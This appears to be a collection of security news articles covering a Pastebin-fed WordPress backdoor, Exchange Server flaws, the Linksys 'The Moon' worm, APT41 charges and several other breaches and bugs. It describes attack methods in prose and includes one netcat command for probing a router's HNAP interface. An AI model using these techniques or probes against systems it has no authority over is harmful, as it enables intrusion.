In order to exploit the vulnerability, first hackers look for a RevSlider plugin in the target website and once discovered, they use a second vulnerability in Revslider and attempt to upload a malicious backdoor to the website.
""Technically, the criminals used Pastebin for what it was built for – to share code snippets,"" Sinegubko wrote in a blog post. ""The only catch is that the code is malicious, and it is used in illegal activity (hacking) directly off of the Pastebin website.""
Security researchers came across a segment of code that injects the content of a Base64-encoded $temp variable into a WordPress core wp-links-opml.php file. Researchers noticed some code is being downloaded from the legitimate Pastebin.com website and is dependent on using a parameter, wp_nonce_once, that disguises the fact that it calls upon an actual Pastebin file.
The wp_nonce_once parameter, which is commonly used to protect against unexpected or duplicate requests, also makes the malicious code difficult to block, and at the same time ""adds flexibility to the backdoor,"" the researcher claims.
This means that the malicious backdoor can be tricked to download and execute any code snippet hosted on Pastebin — even those that don't exist at the time of injection — you just need to pass a request through that wp-links-opml.php file.
So far, it's unclear exactly how widespread this malicious backdoor is, but the impact could be much dangerous when it comes to Pastebin which has 1.5 million active user accounts as of last year.
Founded in 2002, Pastebin was initially developed as an open online forum where computer developers could share programming code. But the site's gradual appeal to hackers of all ranks made it increasingly difficult to monitor the site for bad behavior. Many hacker groups share data stolen from famous companies via the service and some pastes are also known to be used in malware attacks, which may contain encrypted addresses and even base64-encoded malicious binary code.
Last month security researchers at Sucuri discovered a new type of malware threat, dubbed SoakSoak, that was modifying files in WordPress websites that used an older version of ""Slider Revolution,"" aka RevSlider, a slideshow plugin. At the time, the search engine giant Google blacklisted over 11,000 websites it spotted spreading the malware.
NSA Discovers New Vulnerabilities Affecting Microsoft Exchange Servers,https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html,"In its April slate of patches, Microsoft rolled out fixes for a total of 114 security flaws, including an actively exploited zero-day and four remote code execution bugs in Exchange Server.
Of the 114 flaws, 19 are rated as Critical, 88 are rated Important, and one is rated Moderate in severity.
Chief among them is CVE-2021-28310, a privilege escalation vulnerability in Win32k that's said to be under active exploitation, allowing attackers to elevate privileges by running malicious code on a target system.
Cybersecurity firm Kaspersky, which discovered and reported the flaw to Microsoft in February, linked the zero-day exploit to a threat actor named Bitter APT, which was found exploiting a similar flaw (CVE-2021-1732) in attacks late last year.
""It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access,"" Kaspersky researcher Boris Larin said.
NSA Found New Bugs Affecting Exchange Server
Also fixed by Microsoft are four remote code execution (RCE) flaws (CVE-2021-28480 through CVE-2021-28483) affecting on-premises Exchange Servers 2013, 2016, and 2019 that were reported to the company by the U.S. National Security Agency (NSA). Two of the code execution bugs are unauthenticated and require no user interaction, and carry a CVSS score of 9.8 out of a maximum of 10.
While the Windows maker said it had found no evidence of any active exploits in the wild, it's recommended that customers install these updates as soon as possible to secure the environment, particularly in light of the widespread Exchange Server hacks last month and new findings that attackers are attempting to leverage the ProxyLogon exploit to deploy malicious cryptominers onto Exchange Servers, with the payload being hosted on a compromised Exchange Server.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also revised the emergency directive it issued last month, stating ""these vulnerabilities pose an unacceptable risk to the Federal enterprise and require an immediate and emergency action,"" while cautioning that the underlying flaws can be weaponized by reverse-engineering the patch to create an exploit.
Cybersecurity firm Check Point, which has been tracking ongoing cyber threats exploiting the Exchange Server flaws, said a total of 110,407 attacks have been prevented targeting government, manufacturing, finance, healthcare, legal, and insurance industries in the U.S., U.K., Germany, Netherlands, and Brazil.
FBI Removed Backdoors From Hacked MS Exchange servers
What's more, the U.S. Federal Bureau of Investigation (FBI) carried out a ""successful action"" to ""copy and remove"" web shells planted by adversaries on hundreds of victim computers using the ProxyLogon flaws. The FBI is said to have wiped the web shells that were installed by Hafnium that could have been used to maintain and escalate persistent, unauthorized access to U.S. networks.
""The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),"" the Justice Department said in a statement detailing the court-authorized operation.
27 RCE Flaws in Windows RPC and Other Fixes
Microsoft also said four additional vulnerabilities were publicly known at the time of release but not exploited —
CVE-2021-28458 - Azure ms-rest-nodeauth Library Elevation of Privilege Vulnerability
CVE-2021-27091 - RPC Endpoint Mapper Service Elevation of Privilege Vulnerability
CVE-2021-28437 - Windows Installer Information Disclosure Vulnerability
CVE-2021-28312 - Windows NTFS Denial of Service Vulnerability
In addition, April's Patch Tuesday update also addresses a whopping 27 RCE flaws in Remote Procedure Call (RPC) runtime, a Hyper-V security feature bypass vulnerability (CVE-2021-28444), and multiple privilege escalation flaws in Windows Speech Runtime, Windows Services and Controller App, Windows Secure Kernel Mode, Windows Event Tracing, and Windows Installer.
Software Patches From Other Vendors
Besides Microsoft, a number of other vendors have also released a slew of patches on Tuesday —
Adobe (security updates for Photoshop, Digital Editions, RoboHelp, and Bridge)
Linux distributions SUSE, Oracle Linux, and Red Hat
Schneider Electric, and
Linksys Malware 'The Moon' Spreading from Router to Router,https://thehackernews.com/2014/02/linksys-malware-moon-spreading-from.html,"Which Wireless Router do you have at your Home or Office? If it's a Linksys Router you could be in the danger to a new malware that attacks your firmware and replicates itself.
Security researcher Johannes B. Ullrich from the SANS Technology Institute has warned about a self-replicating malware which is exploiting authentication bypass and code-execution vulnerabilities in the Linksys wireless routers.
The Malware named as 'THE MOON', scans for other vulnerable devices to spread from router to router and Johannes confirmed that the malicious worm has already infected around 1,000 Linksys E1000, E1200, and E2400 routers.
In order to hack the Router, malware remotely calls the Home Network Administration Protocol (HNAP), allows identification, configuration and management of networking devices.
The Malware first request the model and firmware version of the router using HNAP and if the device founds vulnerable, it sends a CGI script exploit to get the local command execution access to the device.
Linksys's parent company has confirmed that HNAP1 implementation has a security flaw whose exploit code is publicly available on the Internet.
""There are about 670 different IP ranges that it scans for other routers. They appear to all belong to different cable modem and DSL ISPs. They are distributed somewhat worldwide),""
'To what extent this worm can be dangerous' is yet a question.
""We are still working on analysis what it exactly does. But so far, it looks like all it does is spread (which is why we call it a worm). It may have a 'call-home' feature that will report back when it infected new hosts.""
To verify that your device is vulnerable or not, use following command (depending on your OS):
echo [-e] ""GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n"" | nc routerip 8080
If you receive an XML HNAP reply, you are likely to be victimized for the worm affecting Linksys devices and some preventive measures are to be taken. Also keep an eye on the logs of port 80 and 8080.
Users are recommended to Disable Remote Administration of their device or limits the administration right to a limited number of trusted IP addresses.
FlashBack Checker - Tool Detects Flashback Mac Malware,https://thehackernews.com/2012/04/flashback-checker-tool-detects.html,"FlashBack Checker - Tool Detects Flashback Mac Malware
A Mac developer has posted a tool that detects a Flashback malware infection on Apple's computers. Last week we posted about, More than 600000 Macs system infected with Flashback Botnet. That's slightly more than 1 percent of all 45 million Macs in the world still a relatively small number, but a worrisome one for Mac users, as the tally of infected machines continues to grow.
FlashBack Checker - 38KB tool was created by Juan Leon, a software engineer at Garmin International, the Kansas-based company best known for its GPS devices.
When Flashback Checker is run, it displays ""No signs of infection were found"" or provides additional information if it does detect changes the malware has made to the Mac.
According to Dr. Web, the Russian security company that was the first firm to quantify Flashback infections, nearly 2% of all Macs have been hit by the malware.
Dr. Web used a different technique to detect Flashback than Leon. Rather than examine the Mac itself, Dr. Web's tool compares the UUID (universally unique identifiers) of a machine to the list of UUIDs of infected Macs it compiled after commandeering a hacker command-and-control (C&C) server.
To help tackle the recent Flashback malware threat, Apple released a couple of updates for the Java runtime in OS X to bring it up to the latest Java release (version 1.6.0_31), which patches the vulnerability being exploited.
The download is posted to github and can run on Mac OS X10.5 and above. Leon also posted the source code for those interested in checking it out.
FBI adds 5 Chinese APT41 hackers to its Cyber's Most Wanted List,https://thehackernews.com/2020/09/apt41-hackers-wanted-by-fbi.html,"The United States government today announced charges against 5 alleged members of a Chinese state-sponsored hacking group and 2 Malaysian hackers that are responsible for hacking more than 100 companies throughout the world.
Named as APT41 and also known as 'Barium,' 'Winnti, 'Wicked Panda,' and 'Wicked Spider,' the cyber-espionage group has been operating since at least 2012 and is not just involved in strategic intelligence collection from valuable targets in many sectors, but also behind financially motivated attacks against online gaming industry.
According to a press release published by the U.S. Justice Department, two of the five Chinese hackers—Zhang Haoran (张浩然) and Tan Dailin (谭戴林)—were charged back in August 2019, and the other three of them—Jiang Lizhi (蒋立志), Qian Chuan (钱川) and Fu Qiang (付强)—and two Malaysian co-conspirators were in separate indictments in August 2020.
The later indicted three Chinese hackers are associated with a network security company Chengdu 404 Network Technology, operated as a front by the People's Republic of China.
""FU has been working closely with JIANG since at least 2008, and worked with JIANG at multiple internet and video game related companies. FU has been working with QIAN and JIANG together since at least 2013. Before joining CHENGDU 404, FU described himself as a skilled programmer and developer,"" the court documents say.
As uncovered previously in multiple reports, the APT41 group specializes in software supply-chain attacks, where hackers steal proprietary ""source code, software code signing certificates, customer account data, and valuable business information,"" and distribute digitally signed malicious versions of the software to infect systems at targeted organizations.
According to the court documents, in some cases where the targeted systems didn't have any valuable information, defendants also used ransomware and crypto-jacking malware to monetize their efforts.
The targeted industries include ""software development companies, computer hardware manufacturers, telecommunications providers, social media companies, video game companies, non-profit organizations, universities, think tanks, and foreign governments, as well as pro-democracy politicians and activists in Hong Kong.""
""The defendants also compromised foreign government computer networks in India and Vietnam, and targeted, but did not compromise, government computer networks in the United Kingdom,"" the press release says.
The 2 Malaysian hackers—Wong Ong Hua and Ling Yang Ching—were arrested by Malaysian authorities in Sitiawan on September 14, 2020, and are being extradited to the United States. The FBI confirmed that all 5 Chinese nationals remain at large.
""In addition to arresting warrants for all of the charged defendants, in September 2020, the U.S. District Court for the District of Columbia issued seizure warrants that resulted in the recent seizure of hundreds of accounts, servers, domain names, and command-and-control (C2) 'dead drop' web pages used by the defendants to conduct their computer intrusion offenses,"" the DoJ said.
""The actions by Microsoft [other than Google, Facebook, and Verizon Media] were a significant part of the overall effort to deny the defendants continued access to hacking infrastructure, tools, accounts, and command and control domain names.""
The targeted companies were located in the United States and worldwide, including in Australia, Brazil, Chile, Hong Kong, India, Indonesia, Japan, Malaysia, Pakistan, Singapore, South Korea, Taiwan, Thailand, and Vietnam.
Zhang and Tan have been charged with 25 counts of computer fraud and money laundering, which carry a maximum sentence of 20 years in prison.
Jiang, Qian, and Fu are also facing similar charges with nine counts that carry a maximum sentence of 20 years in prison.
The indictment against Wong and Ling charges the defendants with 23 counts of similar charges, but since they are also involved in false registration of domain names, it would increase the maximum sentence of imprisonment for money laundering to 27 years.
Steam Browser Protocol Vulnerability can allow hackers to hijack PC,https://thehackernews.com/2012/10/steam-browser-protocol-vulnerability.html,"Italian security Researchers Luigi Auriemma and Donato Ferrante from 'ReVuln' reported the flaw in Steam Browser Protocol. Stream the popular online distribution platform with 54 million users.
The flaw allow the attacker to write arbitrary text to file and direct victims to external payloads and even the computer can take over. The popular gaming platform uses the steam:// URL protocol in order to run, install and uninstall games, backup files, connect to servers and reach various sections dedicated to customers.
It is possible to Safari, Maxthon and Firefox and other browsers based on the Mozilla engine, this quietly Steam URLs to invoke.
In report they said that browsers including Firefox and software clients including RealPlayer would execute the external URL handler without warnings and were ""a perfect vector to perform silent Steam browser protocol calls"".
The researchers demonstrated how users on the massive Source game engine, which hosts games like Half-Life and CounterStrike, could be attacked. They used four commands to write custom code to file, including a bat file that executes commands when users started up Steam. They were also able to execute remote malicious code via the Unreal engine which was affected by many integer overflow vulnerabilities.
""In one proof of concept involving the Steam browser, attackers used malicious YouTube links within Steam user profiles to bait users. Users who viewed the videos and wished to leave comments would be phished with malicious steam:// URLs that pointed to external sites."" explained by Darren Pauli.
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"Researchers Get Trolled by Chinese, Pre-Malwartized Xiaomi Mi4 was Duplicate",https://thehackernews.com/2015/03/xiaomi-mobile-security.html,"Recently a mobile-security firm Bluebox claimed that the brand new Xiaomi Mi4 LTE comes pre-installed with spyware/adware and a ""forked"" vulnerable version of Android operating system on top of it, however, the company denies the claim.
Xiaomi, which is also known as Apple of China, provides an affordable and in-budget smartphones with almost all features that an excellent smartphone provides.
On 5th March, when Bluebox researchers claimed to have discovered some critical flaws in Mi4 LTE smartphone, Xiaomi issued a statement to The Hacker News claiming that ""There are glaring inaccuracies in the Bluebox blog post"" and that they are investigating the matter.
Now, Xiaomi responded to Bluebox Labs by preparing a lengthy denial to their claims and said the new Mi4 smartphone purchased by Bluebox team in China (known as the birthplace of fake smartphones) was not an original Xiaomi smartphone but a counterfeit product.
""We have concluded our investigation on this topic — the device Bluebox obtained is 100% proven to be a counterfeit product purchased through an unofficial channel on the streets in China,"" Xiaomi spokesperson told The Hacker News in an email statement. ""It is therefore not an original Xiaomi product and it is not running official Xiaomi software, as Bluebox has also confirmed in their updated blog post.""
This means, Mi4 LTE smartphone owned by Bluebox are tempered by the local Chinese shops itself. What the Heck! Chinese get trolled by Chinese.
Xiaomi provided a detailed step-by-step explanation on each and every fact and figure:
Hardware: Xiaomi hardware experts have analysed the internal device photos provided to the company by Bluebox and confirmed that the physical hardware is markedly different from the original Mi 4 smartphone.
IMEI number: Xiaomi after-sales team has confirmed that the IMEI on the device from Bluebox is a cloned IMEI number which has been previously used on other counterfeit Xiaomi devices in China.
Software: Xiaomi MIUI team has also confirmed that the software installed on the device from Bluebox is not an official Xiaomi MIUI build.
The company assured its customers that their devices neither come rooted, nor have any malware pre-installed.
Contrary to Bluebox claims, the company also assured its customers that the MIUI used in their products is true Android, which means MIUI follows exact Google's Android CDD (Compatibility Definition Document), and passes all Android CTS tests to make sure a given device is fully Android compatible.
Declining to Bluebox finding, Xiaomi released the following statement in an email to The Hacker News:
As this device is not an original Xiaomi product, and not running an official Xiaomi MIUI software build, Bluebox's findings are completely inaccurate and not representative of Xiaomi devices. We believe Bluebox jumped to a conclusion too quickly without a fully comprehensive investigation (for example, they did not initially follow our published hardware verification process correctly due to language barrier) and their attempts to contact Xiaomi were inadequate, considering the severity of their accusations.
With the large parallel street market for mobile phones in China, there exists counterfeit products that are almost indistinguishable on the outside. This happens across all brands, affecting both Chinese and foreign smartphone companies selling in China. Furthermore, ""entrepreneurial"" retailers may add malware and adware to these devices, and even go to the extent of pre-installing modified copies of popular benchmarking software such as CPU-Z and Antutu, which will run ""tests"" showing the hardware is legitimate.
Xiaomi takes all necessary measures to crack down on the manufacturers of fake devices or anyone who tampers with our software, supported by all levels of law enforcement agencies in China.
Casino Sues Cyber Security Company Over Failure to Stop Hackers,https://thehackernews.com/2016/01/casino-hacker.html,"IT security firm Trustwave has been sued by a Las Vegas-based casino operator for conducting an allegedly ""woefully inadequate"" investigation following a network breach of the casino operator's system.
Affinity Gaming, an operator of 5 casinos in Nevada and 6 elsewhere in the United States, has questioned Trustwave's investigation for failing to shut down breach that directly resulted in the theft of credit card data, allowing credit card thieves to maintain their foothold during the investigation period.
The lawsuit, filed in the US District Court in Nevada, is one of the first cases of its kind where a client challenges a cyber security firm over the quality of its investigation following a hacking attack.
Casino Sued an IT Security Firm
Affinity Gaming said it hired Trustwave in late 2013 to analyze and clean up computer network intrusions that allowed attackers to obtain its customers' credit card data.
It was reported that the details on more than 300,000 credit cards used by customers in Affinity's restaurants and hotels were accessed by cyber crooks who compromised its systems.
A report submitted by Trustwave in mid-January 2014 noted that the security firm had:
Identified the source of the data breach
Contained the malware responsible for the incident
However, more than a year later after the casino operator was hit by a second payment card breach, Affinity allegedly learned from Trustwave's competing cybersecurity firm, Mandiant, that the malware had never been fully removed.
The Lawsuit Filed by the Casino Operator
Here's what Affinity claimed in its lawsuit filed at the end of December in the US district court of Nevada:
Hiring a firm with the proper data breach response expertise, such as Trustwave held itself out to be, was of paramount importance for Affinity Gaming...Affinity isn't an IT security firm and lacks the level of expertise.
With respect to the apparent data breach, Affinity Gaming was wholly dependent on and subordinate in terms of its understanding, knowledge, and capabilities, to Trustwave, relying on [it] to diagnose, investigate, and prescribe appropriate measures to address.
Mandiant's forthright and thorough investigation concluded that Trustwave's representations were untrue, and Trustwave's prior work was woefully inadequate. In reality, Trustwave lied when it claimed that its so-called investigation would diagnose and help remedy the data breach when it represented that the data breach was ""contained,"" and when it claimed that the recommendations it was offering would address the data breach. Trustwave...failed to identify the means by which the attacker had breached Affinity Gaming's data security. Thus, Trustwave could not in good faith have made the foregoing representations to Affinity Gaming.
However, Trustwave denies any wrongdoing. A Trustwave spokesperson told the Financial Times (FT) on Friday, ""We dispute and disagree with the allegations in the lawsuit and we will defend ourselves vigorously in court.""
Affinity Gaming is seeking a minimum of $100,000 in damages from Trustwave.
North Korean Hackers Steal thousands of Military files from S. Korea,https://thehackernews.com/2016/06/north-korean-hackers.html,"Hackers aligned with North Korea have always been accused of attacking and targeting South Korean organizations, financial institutions, banks and media outlets.
Recent reports indicate that North Korean hackers have hacked into more than 140,000 computers of at least 160 South Korean government agencies and companies, and allegedly injected malware in the systems.
The cyber attack was designed to lay for a long term period against its rival, authorities in Seoul said.
The South Korean police were on high alert against cyberattacks by the North Korean hackers, especially after North Korea successfully tested a miniaturized hydrogen bomb in January and a long-range rocket launch in February, Reuters reports.
According to the police, the hacking attack began in 2014 but was detected only in February this year, after North Korea managed to steal information from two companies: the SK and Hanjin Group.
The documents stolen from the two companies included blueprints for the wings of F-15 fighter jets, an official at the South Korea cyber investigation unit confirmed.
The investigation unit said, ""There is a high possibility that the North aimed to cause confusion on a national scale by launching a simultaneous attack after securing many targets of cyber terror, or intended to continuously steal industrial and military secrets.""
More than 42,000 materials were stolen in the hack, of which more than 40,000 materials were defense-related.
Although a South Korean defense ministry official said that the stolen documents were not secret and that there wasn't any security breach, a spokesperson from SK Holdings stated that 4 group affiliates were affected by the cyber attack.
The cyber attack originated from an IP address traced down to the North Korea and was intended to target the network management software used by 160 companies and government agencies in South Korea.
The police declined to identify the malicious software, though the IP address from where the hack was originated was identical to one used in a 2013 cyberattack against banks and TV broadcasters in South Korea.
The South Korean police were then teamed up with companies and other government agencies to disable the malware and prevent the malicious code from further spreading, in what could lead to a massive cyber attack.
Flaw in Emergency Alert Systems Could Allow Hackers to Trigger False Alarms,https://thehackernews.com/2018/04/hacking-emergency-alert-sirens.html,"A serious vulnerability has been exposed in ""emergency alert systems"" that could be exploited remotely via radio frequencies to activate all the sirens, allowing hackers to trigger false alarms.
The emergency alert sirens are used worldwide to alert citizens about natural disasters, man-made disasters, and emergency situations, such as dangerous weather conditions, severe storms, tornadoes and terrorist attacks.
False alarms can create panic and chaos across the city, as witnessed in Dallas last year, when 156 emergency sirens were turned on for about two hours, waking up residents and sparking fears of a disaster.
Dubbed ""SirenJack Attack,"" the vulnerability discovered by a researcher at Bastille security firm affects warning sirens manufactured by Boston-based ATI Systems, which are being used across major towns and cities, as well as Universities, military facilities, and industrial sites.
According to Balint Seeber, director of threat research at Bastille, since the radio protocol used to control affected sirens is not using any kind of encryption, attackers can simply exploit this weakness to activate sirens by sending a malicious activation message.
""All that is required is a $30 handheld radio and a computer,"" Seeber claims.
To perform the SirenJack attack, a hacker needs to be in the radio range and identify the radio frequency used by the targeted siren in order to send a specially crafted message.
""Once the frequency was found, analysis of the radio protocol quickly showed that commands were not encrypted and therefore vulnerable to forgery, rendering the system susceptible to malicious activations,"" Seeber explains.
Researcher finds that Outdoor Public Warning System implemented within the City of San Francisco, designed to alert residents and visitors of about possible danger, has more than 100 warning sirens that malicious hackers can exploit to cause widespread panic and annoyance across the city.
Seeber responsibly disclosed this issue to ATI Systems 90 days ago (on January 8). ATI Systems says the patch is being tested and will shortly be made available to fix its systems implemented in the City of San Francisco.
However, ATI Systems noted that installing the patch is not easy since many of its products are designed depending upon specific needs of each of its customers.
Therefore, customers are advised to contact ATI Systems to determine if they have a vulnerable configuration and/or flawed version of the system, and then take the appropriate steps suggested to remediate the issue.
Bastille researchers also encourage other siren manufacturers to ""investigate their own systems to patch and fix this type of vulnerability,"" in case they find it.
Extortion Gang Breaches Cybersecurity Firm Qualys Using Accellion Exploit,https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html,"Enterprise cloud security firm Qualys has become the latest victim to join a long list of entities to have suffered a data breach after zero-day vulnerabilities in its Accellion File Transfer Appliance (FTA) server were exploited to steal sensitive business documents.
As proof of access to the data, the cybercriminals behind the recent hacks targeting Accellion FTA servers have shared screenshots of files belonging to the company's customers on a publicly accessible data leak website operated by the CLOP ransomware gang.
Confirming the incident, Qualys Chief Information Security Officer Ben Carr said a detailed probe ""identified unauthorized access to files hosted on the Accellion FTA server"" located in a DMZ (aka demilitarized zone) environment that's segregated from the rest of the internal network.
""Based on this investigation, we immediately notified the limited number of customers impacted by this unauthorized access,"" Carr added. ""The investigation confirmed that the unauthorized access was limited to the FTA server and did not impact any services provided or access to customer data hosted by the Qualys Cloud Platform.""
Last month, FireEye's Mandiant threat intelligence team disclosed details of four zero-day flaws in the FTA application that were exploited by threat actors to mount a wide-ranging data theft and extortion campaign, which involved deploying a web shell called DEWMODE on target networks to exfiltrate sensitive data, followed by sending extortion emails to threaten victims into paying bitcoin ransoms, failing which the stolen data was posted on the data leak site.
While two of the flaws (CVE-2021-27101 and CVE-2021-27104) were addressed by Accellion on December 20, 2020, the other two vulnerabilities (CVE-2021-27102 and CVE-2021-27103) were identified earlier this year and fixed on January 25.
Qualys said it received an ""integrity alert"" suggesting a possible compromise on December 24, two days after it applied the initial hotfix on December 22. The company didn't say if it received extortion messages in the wake of the breach, but said an investigation into the incident is ongoing.
""The exploited vulnerabilities were of critical severity because they were subject to exploitation via unauthenticated remote code execution,"" Mandiant said in a security assessment of the FTA software published earlier this week.
Additionally, Mandiant's source code analysis uncovered two more previously unknown security flaws in the FTA software, both of which have been rectified in a patch (version 9.12.444) released on March 1 —
CVE-2021-27730: An argument injection vulnerability (CVSS score 6.6) accessible only to authenticated users with administrative privileges, and
CVE-2021-27731: A stored cross-site scripting flaw (CVSS score 8.1) accessible only to regular authenticated users
The FireEye-owned subsidiary is tracking the exploitation activity and the follow-on extortion scheme under two separate threat clusters it calls UNC2546 and UNC2582, respectively, with overlaps identified between the two groups and previous attacks carried out by a financially motivated threat actor dubbed FIN11. But it is still unclear what connection, if any, the two clusters may have with the operators of Clop ransomware.
Unpatched vCard Flaw Could Let Attackers Hack Your Windows PCs,https://thehackernews.com/2019/01/vcard-windows-hacking.html,"A zero-day vulnerability has been discovered and reported in the Microsoft's Windows operating system that, under a certain scenario, could allow a remote attacker to execute arbitrary code on Windows machine.
Discovered by security researcher John Page (@hyp3rlinx), the vulnerability was reported to the Microsoft security team through Trend Micro's Zero Day Initiative (ZDI) Program over 6 months ago, which the tech giant has refused to patch, at least for now.
The vulnerability, which has not been assigned any CVE number, actually resides within the processing of a vCard file—a standard file format for storing contact information for a person or business, which is also supported by Microsoft Outlook.
According to the researcher, a remote attacker can maliciously craft a VCard file in a way that the contact's website URL stored within the file points to a local executable file, which can be sent within a zipped file via an email or delivered separately via drive-by-download techniques.
As shown in the video demonstration, if a victim clicks that website URL, the Windows operating system would run the malicious executable without displaying any warning, instead of opening the web address on the browser.
""Crafted data in a VCard file can cause Windows to display a dangerous hyperlink,"" the researcher writes in an advisory. ""The user interface fails to provide any indication of the hazard. An attacker can leverage this vulnerability to execute code in the context of the current user.""
Obviously, ""user interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.""
Although the attack requires user's interaction, leaving the vulnerability unpatched would leave an opportunity for sophisticated attackers to target Windows users at large.
The researcher has also published proof-of-concept exploit code for the vulnerability, which has been assigned a CVSS 3.0 score of 7.8.
Malicious Chrome Extension Hijacks CryptoCurrencies and Wallets,https://thehackernews.com/2014/04/malicious-chrome-extension-hijacks.html,"Although the number of malicious browser extensions has significantly increased in the past years, but recently a new extension of the Google Chrome is allegedly targeting Cryptocurrency users that is capable of stealing Bitcoins and other crypto coins silently.
The malicious Chrome browser extension dubbed as 'Cryptsy Dogecoin (DOGE) Live Ticker' which is available on Chrome Web store for free downloads and developed by ""TheTrollBox"" account. Reddit user noticed that the updated version of the extension has a malicious code, which is designed to hijack the crypto currency transactions.
It is very obvious that the kind of crypto related software extensions is downloaded only by the users who deal with the digital currency. So, once the user installed the malicious extension, the software within the extension starts monitoring users' web activity and looks for those users who go to Cryptocurrency exchange sites such as Coinbase and MintPal.
After realizing that the user is performing a transaction in digital coins, the malicious extension replaces the receiving address, where the user is trying to transfer his Cryptocurrency, with the a different BTC address of its own (attacker's bitcoin address)
The same happened to a Reddit user, who had been reported this activity from the Cryptocurrency exchange MintPal in a withdrawal confirmation. After then he posted a Warning about the rogue extension on Reddit, advising all to ""Be careful of what you install on your devices you use to access your wallets.""
TheTrollBox, the developer of malicious 'Cryptsy Dogecoin (DOGE) Live Ticker' Chrome extension has also developed 21 more similar extensions, which are currently available on Google Chrome Store. These Chrome extensions also could be susceptible to have malicious code, and Google has not taken any action against the reported chrome extensions.
If you have installed any of the followings extensions, then you should remove them as soon as possible:
Cryptsy MOON
Cryptsy DOGE
Cryptsy LOT
Coinbase BTC
Bitstamp BTC
BitcoinAverage BTC
As the business has moved to greater use of mobile and non-Windows computers, so cyber criminals have adapted techniques monetize their efforts. Due to an increase in the value of digital coins, cyber criminals has added it in their watchlist and making every effort to steal your virtual money.
We have seen Android malware distributed by cyber criminals on Google play store that have hidden Coinkrypt malware, which had capability to turn your mobile device into crypto-currency miners, also cybercriminals spreading malware through Home appliances in order to mine virtual currencies, and now they are started editing software extensions with malicious codes to grab users digital coins.
Users are advised to choose a Crypto currency exchange or wallet service that enables two-factor authentication for the high level of security of their virtual wallets, as two-factor authentication required more than one device, which will eventually decrease the chances of malicious malware modifying changes to your transactions.
"Hack Leads to Extortions and Suicides! Ashley Madison puts $500,000 Bounty on Hackers' Head",https://thehackernews.com/2015/08/ashley-madison-hack_24.html,"It's been a rough week for cheating website Ashley Madison, whose slogan is ""Life is short, have an affair.""
Last week, the Impact Team, who claimed to hack Ashley Madison, posted 10GB of personal data for tens of Millions of its customers, including their names and email addresses.
The hackers made things even worse by releasing another 20GB of company's internal data, including personal emails from the CEO of Ashley Madison parent company Avid Life, Noel Biderman, along with the source code for Ashley Madison's website and mobile apps.
However, regardless of how you respond to the Ashley Madison hack, the bottom line is that what the hackers, who called themselves The Impact Team, did was highly illegal.
Not just illegal, but now the Ashley Madison hack has become a reason for suicides, blackmail and multiple cases of extortion.
""Two unconfirmed reports of suicides due to #AshleyMadisonHack, says Acting Staff Superintendent Bryce Evans at Aug 24 press conference,"" Toronto Police (@TorontoPolice) tweeted.
Ashley Madison offering $500,000 Reward
These are precisely the reasons why Ashley Madison, the popular extramarital affair website, is offering a CA$500,000 (About $379,000 USD) reward to anyone with information that leads to the arrest of the hackers responsible for the embarrassing leak of users' data.
The bounty offer was announced by Toronto police's acting staff Superintendent Bryce Evans at the televised and Webcast news press conference in Toronto Monday morning.
While announcing the reward, Evans noted that The Impact Team's actions ""have a long-term social and economic impact"" and appealed to the public and white-hat hacker community to help authorities in tracking down the Impact Team.
Evans also issued the following statement to warn the Impact Team:
""Team Impact. I want to make it very clear to you. Your actions are illegal, and won't be tolerated. This is your wake-up call.""
Moreover, Evans noted if any of the Ashley Madison customers is being extorted by the hackers should immediately contact their local police department.
You can watch the full press conference video here.
Critical Flaw in Grammarly Spell Checker Could Let Attackers Steal Your Data,https://thehackernews.com/2018/02/grammar-checking-software.html,"A critical vulnerability discovered in the Chrome and Firefox browser extension of the grammar-checking software Grammarly inadvertently left all 22 million users' accounts, including their personal documents and records, vulnerable to remote hackers.
According to Google Project Zero researcher Tavis Ormandy, who discovered the vulnerability on February 2, the Chrome and Firefox extension of Grammarly exposed authentication tokens to all websites that could be grabbed by remote attackers with just 4 lines of JavaScript code.
In other words, any website a Grammarly user visits could steal his/her authentication tokens, which is enough to login into the user's account and access every ""documents, history, logs, and all other data"" without permission.
""I'm calling this a high severity bug, because it seems like a pretty severe violation of user expectations,"" Ormandy said in a vulnerability report. ""Users would not expect that visiting a website gives it permission to access documents or data they've typed into other websites.""
Ormandy has also provided a proof-of-concept (PoC) exploit, which explains how one can easily trigger this serious bug to steal Grammarly user's access token with just four lines of code.
This high-severity flaw was discovered on Friday and fixed early Monday morning by the Grammarly team, which, according to the researcher, is ""a really impressive response time"" for addressing such bugs.
Security updates are now available for both Chrome and Firefox browser extensions, which should get automatically updated without requiring any action by Grammarly users.
A Grammarly spokesperson also told in an email that the company has no evidence of users being compromised by this vulnerability.
""Grammarly resolved a security bug reported by Google's Project Zero security researcher, Tavis Ormandy, within hours of its discovery. At this time, Grammarly has no evidence that any user information was compromised by this issue,"" the spokesperson said.
""We're continuing to monitor actively for any unusual activity. The security issue potentially affected text saved in the Grammarly Editor. This bug did not affect the Grammarly Keyboard, the Grammarly Microsoft Office add-in, or any text typed on websites while using the Grammarly browser extension. The bug is fixed, and there is no action required by Grammarly users.""
Stay tuned for more updates.
Windows zero day vulnerability publicly exposed by Google engineer,https://thehackernews.com/2013/05/windows-zero-day-vulnerability-publicly.html,"A Google security engineer has not only discovered a Windows zero-day flaw, but has also stated that Microsoft has a knack of treating outside researchers with great hostility.
Tavis Ormandy, a Google security engineer, exposed the flaw on Full Disclosure, that could be used to crash PCs or gain additional access rights. The issue is less critical than other flaws as it's not a remotely exploitable one.
Ormandy said on Full Disclosure, ""I don't have much free time to work on silly Microsoft code, so I'm looking for ideas on how to fix the final obstacle for exploitation."".
He's been working on it for months, and according to a later post, he has now a working exploit that ""grants SYSTEM on all currently supported versions of Windows.""
""I have a working exploit that grants SYSTEM on all currently supported versions of Windows. Code is available on request to students from reputable schools,"" Ormandy adds.
Microsoft acknowledged the vulnerability late Tuesday. ""We are aware of claims regarding a potential issue affecting Microsoft Windows and are investigating""
Ormandy also insulted Microsoft on Full Disclosure, saying ""As far as I can tell, this code is pre-NT (20+ years) old, so remember to thank the SDL for solving security and reminding us that old code doesn't need to be reviewed ;-).""
